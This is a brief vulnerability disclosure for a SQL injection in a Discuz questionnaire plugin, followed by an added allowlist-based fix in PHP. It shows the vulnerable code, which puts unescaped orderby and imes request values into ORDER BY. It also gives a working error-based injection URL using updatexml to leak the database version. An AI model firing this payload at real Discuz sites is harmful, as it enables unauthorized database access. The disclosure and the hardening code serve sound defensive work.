Discuz Questionnaire Survey Professional Edition Plugin Injection

没穿底裤 · January 1, 2020, 03:05:35
Summary

nds_ques_viewanswer.inc.php, test method:

nds_ques_viewanswer.inc.php

<?PHP
if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}
!empty($_G['gp_srchtxt']) ? $wherestr .= " AND  author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " : '';
$orderby = $_G['gp_orderby'] ? $_G['gp_orderby'] : 'dateline'; // get the parameter
$imes = $_G['gp_imes'] ? $_G['gp_imes'] : 'DESC';
$questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");
$sysmode = $questopics['ques_mode'];
....
$magiccount = DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);
$multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);
$topiclist = '';
$nid = $start_limit+1;
$query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr."  ORDER by $orderby $imes LIMIT $start_limit,$perpage"); // carried into the query
....
?>

Test method:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--
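
The snippet above places `orderby` and `imes` from the request directly after ORDER BY, a position where quoting or escaping a string value does not help. A hardened form of that clause, as an added example (not the plugin's code or a vendor patch): it assumes `dateline` and `author` are the sortable columns, and the function names are hypothetical.

```php
<?php
// Added example, not the plugin's own code.

// Assumption: `dateline` and `author` are sortable columns of ques_user
// (both names appear in the snippet above); extend the list as needed.
function sort_column($input)
{
    $allowed = array('dateline', 'author');
    // Strict match against fixed literals: the value placed in the SQL is
    // always one of our own strings. Arrays (orderby[]=x) fail the match.
    return in_array($input, $allowed, true) ? $input : 'dateline';
}

function sort_direction($input)
{
    // Only two keywords are valid after ORDER BY <column>.
    return (is_string($input) && strtoupper($input) === 'ASC') ? 'ASC' : 'DESC';
}

function order_limit_clause($orderby, $imes, $start, $perpage)
{
    // Identifiers and keywords cannot be bound as query parameters, so they
    // are allowlisted; the LIMIT operands are forced to sane integers.
    return sprintf(
        ' ORDER BY `%s` %s LIMIT %d,%d',
        sort_column($orderby),
        sort_direction($imes),
        max(0, (int)$start),
        max(1, (int)$perpage)
    );
}

// Constructed request values; the second orderby string is the one from
// the test URL on this page.
$samples = array(
    array('author', 'asc'),
    array('dateline and 1=(updatexml(1,concat(0x27,version()),1))--', 'DESC'),
    array(array('dateline'), 'DESC; --'),
);
foreach ($samples as $s) {
    echo order_limit_clause($s[0], $s[1], 0, 20), "\n";
}
```

Because the allowlisted values are also what gets echoed into the pagination link built by `multi()`, the same two functions should be applied before that call, not only before the query.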
